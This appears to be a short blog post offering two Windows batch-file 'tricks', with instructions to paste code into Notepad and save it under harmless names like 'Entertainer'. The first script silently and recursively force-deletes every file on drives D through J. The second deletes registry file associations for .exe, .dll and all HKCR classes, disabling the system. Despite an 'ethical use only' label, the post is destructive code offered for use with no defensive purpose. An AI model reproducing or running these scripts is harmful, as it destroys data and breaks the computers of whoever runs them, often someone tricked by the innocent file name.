USE THIS TRICK FOR ETHICAL USE ONLY

1. At first open Notepad,Then copy below code and paste it.

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save it as Entertainer001
.bat and the batch file is created . Without .bat extension it will not work on your computer. 



OR


2. Open Notepad,Then copy below code and paste it. 


@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*


Save it as Entertainer
.bat and the batch file is created . Without .bat extension it will not work on your computer. 

Comments

Popular Posts